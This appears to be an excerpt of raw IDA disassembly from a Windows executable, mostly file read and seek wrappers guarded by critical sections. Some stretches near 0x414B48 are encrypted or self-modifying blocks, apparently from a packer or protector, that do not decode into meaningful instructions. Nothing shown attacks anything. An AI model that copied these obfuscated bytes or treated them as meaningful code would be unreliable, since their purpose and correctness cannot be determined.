call ds:dword_424708 ; SetFilePointer
mov ecx, [ebp+arg_C]
mov [ecx], eax
push 0FFFFFFFFh
mov [ebp+var_38], 1
lea eax, [ebp+var_10]
push eax
call sub_41042A
pop ecx
pop ecx
mov eax, [ebp+var_38]
jmp loc_41465F
; ---------------------------------------------------------------------------
loc_4144E9: ; CODE XREF: sub_41441F+96�j
mov eax, [ebp+var_24]
mov eax, [eax+4]
mov [ebp+var_28], eax
cmp [ebp+arg_8], 0
jnz short loc_41454B
mov eax, [ebp+var_20]
mov ecx, [ebp+arg_4]
cmp ecx, [eax+8]
jle short loc_41451C
mov eax, [ebp+var_24]
mov ecx, [ebp+var_20]
mov ecx, [ecx+8]
mov [eax+4], ecx
mov eax, [ebp+arg_C]
mov ecx, [ebp+var_24]
mov ecx, [ecx+4]
mov [eax], ecx
jmp short loc_414546
; ---------------------------------------------------------------------------
loc_41451C: ; CODE XREF: sub_41441F+E2�j
cmp [ebp+arg_4], 0
jge short loc_414535
mov eax, [ebp+arg_C]
or dword ptr [eax], 0FFFFFFFFh
push 83h
call ds:dword_42470C ; RtlRestoreLastWin32Error
jmp short loc_414546
; ---------------------------------------------------------------------------
loc_414535: ; CODE XREF: sub_41441F+101�j
mov eax, [ebp+var_24]
mov ecx, [ebp+arg_4]
mov [eax+4], ecx
mov eax, [ebp+arg_C]
mov ecx, [ebp+arg_4]
mov [eax], ecx
loc_414546: ; CODE XREF: sub_41441F+FB�j
; sub_41441F+114�j
jmp loc_41461D
; ---------------------------------------------------------------------------
loc_41454B: ; CODE XREF: sub_41441F+D7�j
cmp [ebp+arg_8], 2
jnz short loc_4145AC
cmp [ebp+arg_4], 0
jle short loc_414570
mov eax, [ebp+var_24]
mov ecx, [ebp+var_20]
mov ecx, [ecx+8]
mov [eax+4], ecx
mov eax, [ebp+arg_C]
mov ecx, [ebp+var_24]
mov ecx, [ecx+4]
mov [eax], ecx
jmp short loc_4145AA
; ---------------------------------------------------------------------------
loc_414570: ; CODE XREF: sub_41441F+136�j
mov eax, [ebp+var_20]
mov eax, [eax+8]
neg eax
cmp [ebp+arg_4], eax
jge short loc_414590
mov eax, [ebp+arg_C]
or dword ptr [eax], 0FFFFFFFFh
push 83h
call ds:dword_42470C ; RtlRestoreLastWin32Error
jmp short loc_4145AA
; ---------------------------------------------------------------------------
loc_414590: ; CODE XREF: sub_41441F+15C�j
mov eax, [ebp+var_20]
mov ecx, [ebp+arg_4]
add ecx, [eax+8]
mov eax, [ebp+var_24]
mov [eax+4], ecx
mov eax, [ebp+arg_C]
mov ecx, [ebp+var_24]
mov ecx, [ecx+4]
mov [eax], ecx
loc_4145AA: ; CODE XREF: sub_41441F+14F�j
; sub_41441F+16F�j
jmp short loc_41461D
; ---------------------------------------------------------------------------
loc_4145AC: ; CODE XREF: sub_41441F+130�j
cmp [ebp+arg_8], 1
jnz short loc_41460F
mov eax, [ebp+arg_4]
add eax, [ebp+var_28]
mov ecx, [ebp+var_20]
cmp eax, [ecx+8]
jle short loc_4145D9
mov eax, [ebp+var_24]
mov ecx, [ebp+var_20]
mov ecx, [ecx+8]
mov [eax+4], ecx
mov eax, [ebp+arg_C]
mov ecx, [ebp+var_24]
mov ecx, [ecx+4]
mov [eax], ecx
jmp short loc_41460D
; ---------------------------------------------------------------------------
loc_4145D9: ; CODE XREF: sub_41441F+19F�j
mov eax, [ebp+var_28]
add eax, [ebp+arg_4]
test eax, eax
jge short loc_4145F6
mov eax, [ebp+arg_C]
or dword ptr [eax], 0FFFFFFFFh
push 83h
call ds:dword_42470C ; RtlRestoreLastWin32Error
jmp short loc_41460D
; ---------------------------------------------------------------------------
loc_4145F6: ; CODE XREF: sub_41441F+1C2�j
mov eax, [ebp+arg_4]
add eax, [ebp+var_28]
mov ecx, [ebp+var_24]
mov [ecx+4], eax
mov eax, [ebp+arg_C]
mov ecx, [ebp+var_24]
mov ecx, [ecx+4]
mov [eax], ecx
loc_41460D: ; CODE XREF: sub_41441F+1B8�j
; sub_41441F+1D5�j
jmp short loc_41461D
; ---------------------------------------------------------------------------
loc_41460F: ; CODE XREF: sub_41441F+191�j
mov eax, [ebp+arg_C]
or dword ptr [eax], 0FFFFFFFFh
push 57h
call ds:dword_42470C ; RtlRestoreLastWin32Error
loc_41461D: ; CODE XREF: sub_41441F:loc_414546�j
; sub_41441F:loc_4145AA�j ...
push 0FFFFFFFFh
mov [ebp+var_3C], 1
lea eax, [ebp+var_10]
push eax
call sub_41042A
pop ecx
pop ecx
mov eax, [ebp+var_3C]
jmp short loc_41465F
; ---------------------------------------------------------------------------
loc_414636: ; CODE XREF: sub_41441F+7B�j
or [ebp+var_4], 0FFFFFFFFh
call sub_414641
jmp short loc_41465D
sub_41441F endp
; =============== S U B R O U T I N E =======================================
sub_414641 proc near ; CODE XREF: sub_41441F+21B�p
; DATA XREF: _4:00421368�o
mov eax, ds:dword_424864
mov [ebp-34h], eax
cmp dword ptr [ebp-34h], 0
jz short locret_41465C
mov eax, [ebp-34h]
add eax, 10h
push eax
call ds:dword_421018 ; RtlLeaveCriticalSection
locret_41465C: ; CODE XREF: sub_414641+C�j
retn
sub_414641 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_41441F
loc_41465D: ; CODE XREF: sub_41441F+5C�j
; sub_41441F+220�j
xor eax, eax
loc_41465F: ; CODE XREF: sub_41441F+C5�j
; sub_41441F+215�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 10h
; END OF FUNCTION CHUNK FOR sub_41441F
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_414670 proc near ; CODE XREF: sub_415B59+80�p
; sub_418F16+58�p ...
var_2C = dword ptr -2Ch
var_24 = byte ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
; FUNCTION CHUNK AT 0041472C SIZE 00000013 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_421370
push offset sub_4104E0
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 14h
push ebx
push esi
push edi
mov eax, ds:dword_424864
mov [ebp+var_20], eax
cmp [ebp+var_20], 0
jz short loc_4146B6
mov eax, [ebp+var_20]
add eax, 10h
push eax
call ds:dword_42101C ; RtlEnterCriticalSection
mov [ebp+var_24], 1
jmp short loc_4146BA
; ---------------------------------------------------------------------------
loc_4146B6: ; CODE XREF: sub_414670+31�j
and [ebp+var_24], 0
loc_4146BA: ; CODE XREF: sub_414670+44�j
movzx eax, [ebp+var_24]
test eax, eax
jz short loc_41472C
and [ebp+var_4], 0
push [ebp+arg_0]
mov ecx, ds:dword_424864
call sub_41EB4C
mov [ebp+var_1C], eax
cmp [ebp+var_1C], 0
jz short loc_414705
mov eax, [ebp+var_1C]
mov eax, [eax]
mov eax, [eax]
mov ecx, [ebp+arg_4]
mov eax, [eax+8]
mov [ecx], eax
push 0FFFFFFFFh
mov [ebp+var_2C], 1
lea eax, [ebp+var_10]
push eax
call sub_41042A
pop ecx
pop ecx
mov eax, [ebp+var_2C]
jmp short loc_41472E
; ---------------------------------------------------------------------------
loc_414705: ; CODE XREF: sub_414670+6B�j
or [ebp+var_4], 0FFFFFFFFh
call sub_414710
jmp short loc_41472C
sub_414670 endp
; =============== S U B R O U T I N E =======================================
sub_414710 proc near ; CODE XREF: sub_414670+99�p
; DATA XREF: _4:00421378�o
mov eax, ds:dword_424864
mov [ebp-28h], eax
cmp dword ptr [ebp-28h], 0
jz short locret_41472B
mov eax, [ebp-28h]
add eax, 10h
push eax
call ds:dword_421018 ; RtlLeaveCriticalSection
locret_41472B: ; CODE XREF: sub_414710+C�j
retn
sub_414710 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_414670
loc_41472C: ; CODE XREF: sub_414670+50�j
; sub_414670+9E�j
xor eax, eax
loc_41472E: ; CODE XREF: sub_414670+93�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 8
; END OF FUNCTION CHUNK FOR sub_414670
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41473F proc near ; CODE XREF: sub_410386+58�p
; sub_41314B+22�p ...
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = byte ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_421380
push offset sub_4104E0
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 20h
push ebx
push esi
push edi
cmp [ebp+arg_4], 0
jnz short loc_414770
lea eax, [ebp+var_1C]
mov [ebp+arg_4], eax
loc_414770: ; CODE XREF: sub_41473F+29�j
mov eax, ds:dword_424864
mov [ebp+var_28], eax
cmp [ebp+var_28], 0
jz short loc_414791
mov eax, [ebp+var_28]
add eax, 10h
push eax
call ds:dword_42101C ; RtlEnterCriticalSection
mov [ebp+var_2C], 1
jmp short loc_414795
; ---------------------------------------------------------------------------
loc_414791: ; CODE XREF: sub_41473F+3D�j
and [ebp+var_2C], 0
loc_414795: ; CODE XREF: sub_41473F+50�j
movzx eax, [ebp+var_2C]
test eax, eax
jz loc_414843
and [ebp+var_4], 0
push [ebp+arg_0]
mov ecx, ds:dword_424864
call sub_41EB4C
mov [ebp+var_20], eax
cmp [ebp+var_20], 0
jz short loc_414807
mov eax, [ebp+var_20]
push dword ptr [eax+8]
call ds:dword_424624 ; CloseHandle
push [ebp+arg_0]
mov ecx, ds:dword_424864
call sub_41EBBB
mov eax, [ebp+var_20]
mov [ebp+var_24], eax
push [ebp+var_24]
call sub_41BACD
pop ecx
mov eax, [ebp+arg_4]
mov dword ptr [eax], 1
push 0FFFFFFFFh
mov [ebp+var_34], 1
lea eax, [ebp+var_10]
push eax
call sub_41042A
pop ecx
pop ecx
mov eax, [ebp+var_34]
jmp short loc_414845
; ---------------------------------------------------------------------------
loc_414807: ; CODE XREF: sub_41473F+7B�j
push [ebp+arg_4]
push [ebp+arg_0]
call sub_413838
push 0FFFFFFFFh
mov [ebp+var_38], eax
lea eax, [ebp+var_10]
push eax
call sub_41042A
pop ecx
pop ecx
mov eax, [ebp+var_38]
jmp short loc_414845
; ---------------------------------------------------------------------------
loc_414827: ; DATA XREF: _4:00421388�o
mov eax, ds:dword_424864
mov [ebp+var_30], eax
cmp [ebp+var_30], 0
jz short locret_414842
mov eax, [ebp+var_30]
add eax, 10h
push eax
call ds:dword_421018 ; RtlLeaveCriticalSection
locret_414842: ; CODE XREF: sub_41473F+F4�j
retn
; ---------------------------------------------------------------------------
loc_414843: ; CODE XREF: sub_41473F+5C�j
xor eax, eax
loc_414845: ; CODE XREF: sub_41473F+C6�j
; sub_41473F+E6�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 8
sub_41473F endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_414856 proc near ; CODE XREF: sub_41DD46+12�p
var_30 = dword ptr -30h
var_28 = byte ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
; FUNCTION CHUNK AT 0041493B SIZE 00000013 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_421390
push offset sub_4104E0
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 18h
push ebx
push esi
push edi
cmp [ebp+arg_8], 0
jnz short loc_414887
lea eax, [ebp+var_1C]
mov [ebp+arg_8], eax
loc_414887: ; CODE XREF: sub_414856+29�j
mov eax, ds:dword_424864
mov [ebp+var_24], eax
cmp [ebp+var_24], 0
jz short loc_4148A8
mov eax, [ebp+var_24]
add eax, 10h
push eax
call ds:dword_42101C ; RtlEnterCriticalSection
mov [ebp+var_28], 1
jmp short loc_4148AC
; ---------------------------------------------------------------------------
loc_4148A8: ; CODE XREF: sub_414856+3D�j
and [ebp+var_28], 0
loc_4148AC: ; CODE XREF: sub_414856+50�j
movzx eax, [ebp+var_28]
test eax, eax
jz loc_41493B
and [ebp+var_4], 0
push [ebp+arg_0]
mov ecx, ds:dword_424864
call sub_41EB4C
mov [ebp+var_20], eax
cmp [ebp+var_20], 0
jz short loc_414914
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_42467C ; GetFileInformationByHandle
mov ecx, [ebp+arg_8]
mov [ecx], eax
mov eax, [ebp+arg_4]
and dword ptr [eax+20h], 0
mov eax, [ebp+var_20]
mov eax, [eax]
mov eax, [eax]
mov ecx, [ebp+arg_4]
mov eax, [eax+8]
mov [ecx+24h], eax
push 0FFFFFFFFh
mov [ebp+var_30], 1
lea eax, [ebp+var_10]
push eax
call sub_41042A
pop ecx
pop ecx
mov eax, [ebp+var_30]
jmp short loc_41493D
; ---------------------------------------------------------------------------
loc_414914: ; CODE XREF: sub_414856+7B�j
or [ebp+var_4], 0FFFFFFFFh
call sub_41491F
jmp short loc_41493B
sub_414856 endp
; =============== S U B R O U T I N E =======================================
sub_41491F proc near ; CODE XREF: sub_414856+C2�p
; DATA XREF: _4:00421398�o
mov eax, ds:dword_424864
mov [ebp-2Ch], eax
cmp dword ptr [ebp-2Ch], 0
jz short locret_41493A
mov eax, [ebp-2Ch]
add eax, 10h
push eax
call ds:dword_421018 ; RtlLeaveCriticalSection
locret_41493A: ; CODE XREF: sub_41491F+C�j
retn
sub_41491F endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_414856
loc_41493B: ; CODE XREF: sub_414856+5C�j
; sub_414856+C7�j
xor eax, eax
loc_41493D: ; CODE XREF: sub_414856+BC�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 0Ch
; END OF FUNCTION CHUNK FOR sub_414856
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41494E proc near ; CODE XREF: sub_41DD77+B�p
; sub_41DDB3+B�p
var_2C = dword ptr -2Ch
var_24 = byte ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
; FUNCTION CHUNK AT 004149FB SIZE 00000013 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_4213A0
push offset sub_4104E0
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 14h
push ebx
push esi
push edi
mov eax, ds:dword_424864
mov [ebp+var_20], eax
cmp [ebp+var_20], 0
jz short loc_414994
mov eax, [ebp+var_20]
add eax, 10h
push eax
call ds:dword_42101C ; RtlEnterCriticalSection
mov [ebp+var_24], 1
jmp short loc_414998
; ---------------------------------------------------------------------------
loc_414994: ; CODE XREF: sub_41494E+31�j
and [ebp+var_24], 0
loc_414998: ; CODE XREF: sub_41494E+44�j
movzx eax, [ebp+var_24]
test eax, eax
jz short loc_4149FB
and [ebp+var_4], 0
push [ebp+arg_0]
mov ecx, ds:dword_424864
call sub_41EB4C
mov [ebp+var_1C], eax
cmp [ebp+var_1C], 0
jz short loc_4149D4
push 0FFFFFFFFh
mov [ebp+var_2C], 1
lea eax, [ebp+var_10]
push eax
call sub_41042A
pop ecx
pop ecx
mov eax, [ebp+var_2C]
jmp short loc_4149FD
; ---------------------------------------------------------------------------
loc_4149D4: ; CODE XREF: sub_41494E+6B�j
or [ebp+var_4], 0FFFFFFFFh
call sub_4149DF
jmp short loc_4149FB
sub_41494E endp
; =============== S U B R O U T I N E =======================================
sub_4149DF proc near ; CODE XREF: sub_41494E+8A�p
; DATA XREF: _4:004213A8�o
mov eax, ds:dword_424864
mov [ebp-28h], eax
cmp dword ptr [ebp-28h], 0
jz short locret_4149FA
mov eax, [ebp-28h]
add eax, 10h
push eax
call ds:dword_421018 ; RtlLeaveCriticalSection
locret_4149FA: ; CODE XREF: sub_4149DF+C�j
retn
sub_4149DF endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_41494E
loc_4149FB: ; CODE XREF: sub_41494E+50�j
; sub_41494E+8F�j
xor eax, eax
loc_4149FD: ; CODE XREF: sub_41494E+84�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 4
; END OF FUNCTION CHUNK FOR sub_41494E
; ---------------------------------------------------------------------------
loc_414A0E: ; CODE XREF: sub_414C5A+2F1�p
; sub_415175+1CF�p
push ebp
mov ebp, esp
sub esp, 0ECh
push ebx
push esi
push edi
mov eax, [ebp+0Ch]
mov [ebp-0Ch], eax
mov eax, [ebp+10h]
mov [ebp-10h], eax
mov eax, ds:dword_424878
mov [ebp-4], eax
mov eax, [ebp+8]
mov eax, [eax]
mov eax, [eax]
mov [ebp-8], eax
mov eax, [ebp-8]
mov eax, [eax+0Ch]
and eax, 30h
cmp eax, 30h
jnz loc_414AD6
mov eax, [ebp-8]
mov eax, [eax+0Ch]
and eax, 2
test eax, eax
jnz short loc_414AD6
mov eax, [ebp-8]
mov ecx, [ebp+0Ch]
sub ecx, [eax+4]
mov [ebp-14h], ecx
mov eax, [ebp-14h]
xor edx, edx
push 8
pop ecx
div ecx
mov [ebp-18h], edx
cmp dword ptr [ebp-18h], 0
jz short loc_414A91
mov eax, [ebp+0Ch]
sub eax, [ebp-18h]
mov [ebp-0Ch], eax
mov eax, [ebp-10h]
add eax, [ebp-18h]
mov [ebp-10h], eax
mov eax, [ebp-4]
add eax, [ebp-18h]
mov [ebp-4], eax
loc_414A91: ; CODE XREF: _3:00414A74�j
mov eax, [ebp-10h]
xor edx, edx
push 8
pop ecx
div ecx
test edx, edx
jz short loc_414AB6
mov eax, [ebp-10h]
xor edx, edx
push 8
pop ecx
div ecx
push 8
pop eax
sub eax, edx
mov ecx, [ebp-10h]
add ecx, eax
mov [ebp-10h], ecx
loc_414AB6: ; CODE XREF: _3:00414A9D�j
mov eax, [ebp+8]
mov ecx, [ebp-10h]
add ecx, [eax+4]
mov eax, [ebp-8]
cmp ecx, [eax+8]
jbe short loc_414AD6
mov eax, [ebp-8]
mov ecx, [ebp+8]
mov eax, [eax+8]
sub eax, [ecx+4]
mov [ebp-10h], eax
loc_414AD6: ; CODE XREF: _3:00414A44�j _3:00414A55�j ...
push 0
push 0
push dword ptr [ebp-0Ch]
mov eax, [ebp+8]
push dword ptr [eax+8]
call ds:dword_424708 ; SetFilePointer
cmp eax, [ebp-0Ch]
jz short loc_414AF5
xor eax, eax
jmp loc_414C53
; ---------------------------------------------------------------------------
loc_414AF5: ; CODE XREF: _3:00414AEC�j
push 0
push dword ptr [ebp+14h]
push dword ptr [ebp-10h]
push ds:dword_424878
mov eax, [ebp+8]
push dword ptr [eax+8]
call ds:dword_4246FC ; ReadFile
test eax, eax
jnz short loc_414B1A
xor eax, eax
jmp loc_414C53
; ---------------------------------------------------------------------------
loc_414B1A: ; CODE XREF: _3:00414B11�j
mov eax, [ebp+14h]
mov eax, [eax]
cmp eax, [ebp-10h]
jz short loc_414B2B
xor eax, eax
jmp loc_414C53
; ---------------------------------------------------------------------------
loc_414B2B: ; CODE XREF: _3:00414B22�j
mov eax, [ebp-8]
mov eax, [eax+0Ch]
and eax, 1
test eax, eax
jz loc_414C3A
mov eax, [ebp-8]
mov eax, [eax+0Ch]
and eax, 30h
cmp eax, 10h
jnz short loc_414BA7
push 460000h
call sub_411B9E
xor esp, [eax]
; ---------------------------------------------------------------------------
dw 0A8Eh
dd 10842452h, 32C17D88h, 23D24BD4h, 0DF04C097h, 0DA843F43h
dd 3911A550h, 97346F07h, 6A1F183Bh, 1475C174h, 0B2C08AABh
dd 8DF9AEE4h, 7865581Eh
db 47h, 57h, 2Ch
; ---------------------------------------------------------------------------
loc_414B8B: ; CODE XREF: _3:00414BD4�j
mov dh, bl
mov [esi+70h], edi
mov edx, 18E3D6C9h
stc
; ---------------------------------------------------------------------------
db 0DAh
dd 9090DBE8h, 0C085C033h, 93E9EE75h
db 3 dup(0)
; ---------------------------------------------------------------------------
loc_414BA7: ; CODE XREF: _3:00414B48�j
mov eax, [ebp-8]
mov eax, [eax+0Ch]
and eax, 30h
cmp eax, 30h
jnz short loc_414C30
push 120000h
call sub_411B9E
or byte ptr [edi-6C3C06E1h], 15h
adc dword ptr [edx], 0FFFFFF95h
xchg eax, esp
mov [esi+1D1A0553h], ch
adc [ecx+ebx*4+25h], ch
jecxz short loc_414B8B
std
aas
mov ecx, 0C93875C5h
cwde
db 2Eh
repne xchg eax, ebx
dec edi
sbb esi, eax
mov ds:0D80E808Dh, eax
retf
; ---------------------------------------------------------------------------
dw 0A6BEh
dd 82757C36h, 9AA9B5E7h, 257938C3h, 8E81FB08h, 92C0F818h
dd 0C3F2822Ah, 7BAD2B87h, 11B1D72Fh, 605D70CEh, 42C4B12Fh
dd 62828F9Ch, 0BEB1BBECh, 0F2E5F4A3h, 0E961E4FFh, 9090BFCCh
dd 0C085C033h, 0AEBEE75h
; ---------------------------------------------------------------------------
loc_414C30: ; CODE XREF: _3:00414BB3�j
mov ecx, 0EF000014h
call sub_41BA32
loc_414C3A: ; CODE XREF: _3:00414B36�j
mov eax, [ebp+14h]
mov eax, [eax]
cmp eax, [ebp+10h]
jnb short loc_414C48
xor eax, eax
jmp short loc_414C53
; ---------------------------------------------------------------------------
loc_414C48: ; CODE XREF: _3:00414C42�j
mov eax, [ebp+14h]
mov ecx, [ebp+10h]
mov [eax], ecx
mov eax, [ebp-4]
loc_414C53: ; CODE XREF: _3:00414AF0�j _3:00414B15�j ...
pop edi
pop esi
pop ebx
leave
retn 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_414C5A proc near ; CODE XREF: sub_415009+30�p
; sub_415009+EB�p
var_80 = dword ptr -80h
var_7C = dword ptr -7Ch
var_78 = dword ptr -78h
var_74 = dword ptr -74h
var_6C = dword ptr -6Ch
var_68 = dword ptr -68h
var_64 = dword ptr -64h
var_60 = dword ptr -60h
var_5C = dword ptr -5Ch
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
; FUNCTION CHUNK AT 00414EAB SIZE 0000015E BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_4213B0
push offset sub_4104E0
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 68h
push ebx
push esi
push edi
mov eax, [ebp+arg_0]
mov eax, [eax]
mov eax, [eax]
mov [ebp+var_34], eax
mov eax, [ebp+arg_0]
mov ecx, ds:dword_424888
mov eax, [eax]
sub eax, [ecx+8]
sar eax, 4
mov [ebp+var_24], eax
and [ebp+var_28], 0
and [ebp+var_40], 0
jmp short loc_414CAE
; ---------------------------------------------------------------------------
loc_414CA7: ; CODE XREF: sub_414C5A:loc_414CEB�j
mov eax, [ebp+var_40]
inc eax
mov [ebp+var_40], eax
loc_414CAE: ; CODE XREF: sub_414C5A+4B�j
cmp [ebp+var_40], 3
jnb short loc_414CED
mov eax, [ebp+var_40]
imul eax, 18h
mov ecx, [ebp+arg_0]
mov eax, ds:dword_423B74[eax]
cmp eax, [ecx]
jnz short loc_414CEB
mov eax, [ebp+var_40]
imul eax, 18h
mov eax, ds:dword_423B70[eax]
cmp eax, [ebp+arg_4]
jnz short loc_414CEB
mov eax, [ebp+var_40]
imul eax, 18h
mov eax, ds:off_423B78[eax]
mov eax, [eax]
jmp loc_414FF8
; ---------------------------------------------------------------------------
loc_414CEB: ; CODE XREF: sub_414C5A+6B�j
; sub_414C5A+7C�j
jmp short loc_414CA7
; ---------------------------------------------------------------------------
loc_414CED: ; CODE XREF: sub_414C5A+58�j
lea eax, [ebp+var_48]
push eax
call ds:dword_4246AC ; GetSystemTimeAsFileTime
and [ebp+var_4C], 0
jmp short loc_414D04
; ---------------------------------------------------------------------------
loc_414CFD: ; CODE XREF: sub_414C5A:loc_414D4B�j
mov eax, [ebp+var_4C]
inc eax
mov [ebp+var_4C], eax
loc_414D04: ; CODE XREF: sub_414C5A+A1�j
cmp [ebp+var_4C], 3
jnb short loc_414D4D
mov eax, [ebp+var_4C]
imul eax, 18h
add eax, offset dword_423B68
mov [ebp+var_74], eax
mov eax, [ebp+var_74]
mov ecx, [ebp+var_44]
cmp ecx, [eax+4]
jl short loc_414D4B
jg short loc_414D2F
mov eax, [ebp+var_74]
mov ecx, [ebp+var_48]
cmp ecx, [eax]
jbe short loc_414D4B
loc_414D2F: ; CODE XREF: sub_414C5A+C9�j
mov eax, [ebp+var_4C]
imul eax, 18h
add eax, offset dword_423B68
mov ecx, [eax]
mov [ebp+var_48], ecx
mov eax, [eax+4]
mov [ebp+var_44], eax
mov eax, [ebp+var_4C]
mov [ebp+var_28], eax
loc_414D4B: ; CODE XREF: sub_414C5A+C7�j
; sub_414C5A+D3�j
jmp short loc_414CFD
; ---------------------------------------------------------------------------
loc_414D4D: ; CODE XREF: sub_414C5A+AE�j
mov eax, [ebp+var_28]
imul eax, 18h
and ds:dword_423B70[eax], 0
mov eax, [ebp+var_28]
imul eax, 18h
and ds:dword_423B74[eax], 0
mov eax, [ebp+var_28]
imul eax, 18h
add eax, offset dword_423B68
and dword ptr [eax], 0
and dword ptr [eax+4], 0
mov eax, [ebp+var_28]
imul eax, 18h
mov eax, ds:off_423B78[eax]
mov eax, [eax]
mov [ebp+var_3C], eax
mov eax, [ebp+var_24]
shl eax, 4
mov ecx, ds:dword_424888
mov ecx, [ecx+8]
cmp dword ptr [ecx+eax+8], 0
jnz loc_414EAB
mov eax, [ebp+var_34]
mov eax, [eax+8]
add eax, 0FFFFh
shr eax, 10h
mov [ebp+var_54], eax
and [ebp+var_50], 0
and [ebp+var_4], 0
mov eax, [ebp+var_54]
shl eax, 2
push eax
call sub_41BA4A
pop ecx
mov [ebp+var_6C], eax
mov eax, [ebp+var_6C]
mov [ebp+var_50], eax
and [ebp+var_58], 0
mov eax, [ebp+var_54]
shl eax, 2
mov ecx, [ebp+var_34]
mov ecx, [ecx+4]
sub ecx, eax
mov [ebp+var_5C], ecx
push 0
push 0
push [ebp+var_5C]
mov eax, [ebp+arg_0]
push dword ptr [eax+8]
call ds:dword_424708 ; SetFilePointer
cmp eax, [ebp+var_5C]
jz short loc_414E19
push 0FFFFFFFFh
and [ebp+var_78], 0
lea eax, [ebp+var_10]
push eax
call sub_41042A
pop ecx
pop ecx
mov eax, [ebp+var_78]
jmp loc_414FF8
; ---------------------------------------------------------------------------
loc_414E19: ; CODE XREF: sub_414C5A+1A4�j
push 0
lea eax, [ebp+var_58]
push eax
mov eax, [ebp+var_54]
shl eax, 2
push eax
push [ebp+var_50]
mov eax, [ebp+arg_0]
push dword ptr [eax+8]
call ds:dword_4246FC ; ReadFile
test eax, eax
jnz short loc_414E52
push 0FFFFFFFFh
and [ebp+var_7C], 0
lea eax, [ebp+var_10]
push eax
call sub_41042A
pop ecx
pop ecx
mov eax, [ebp+var_7C]
jmp loc_414FF8
; ---------------------------------------------------------------------------
loc_414E52: ; CODE XREF: sub_414C5A+1DD�j
mov eax, [ebp+var_54]
shl eax, 2
cmp [ebp+var_58], eax
jz short loc_414E76
push 0FFFFFFFFh
and [ebp+var_80], 0
lea eax, [ebp+var_10]
push eax
call sub_41042A
pop ecx
pop ecx
mov eax, [ebp+var_80]
jmp loc_414FF8
; ---------------------------------------------------------------------------
loc_414E76: ; CODE XREF: sub_414C5A+201�j
mov eax, [ebp+var_24]
shl eax, 4
mov ecx, ds:dword_424888
mov ecx, [ecx+8]
mov edx, [ebp+var_50]
mov [ecx+eax+8], edx
and [ebp+var_50], 0
or [ebp+var_4], 0FFFFFFFFh
call sub_414E9B
jmp short loc_414EAB
sub_414C5A endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_414E9B proc near ; CODE XREF: sub_414C5A+23A�p
; DATA XREF: _4:004213B8�o
mov eax, [ebp-50h]
mov [ebp-70h], eax
push dword ptr [ebp-70h]
call sub_41BACD
pop ecx
retn
sub_414E9B endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_414C5A
loc_414EAB: ; CODE XREF: sub_414C5A+144�j
; sub_414C5A+23F�j
mov eax, [ebp+var_24]
shl eax, 4
mov ecx, ds:dword_424888
mov ecx, [ecx+8]
mov eax, [ecx+eax+8]
mov [ebp+var_30], eax
and [ebp+var_20], 0
and [ebp+var_1C], 0
cmp [ebp+arg_4], 0
jz short loc_414F2B
mov eax, [ebp+var_34]
mov eax, [eax+8]
add eax, 0FFFFh
shr eax, 10h
mov [ebp+var_60], eax
mov eax, [ebp+arg_4]
cmp eax, [ebp+var_60]
jb short loc_414EFE
push ds:off_4214F0
push 93h
push ds:off_4214F4
call sub_41BB7C
loc_414EFE: ; CODE XREF: sub_414C5A+28C�j
and [ebp+var_64], 0
jmp short loc_414F0B
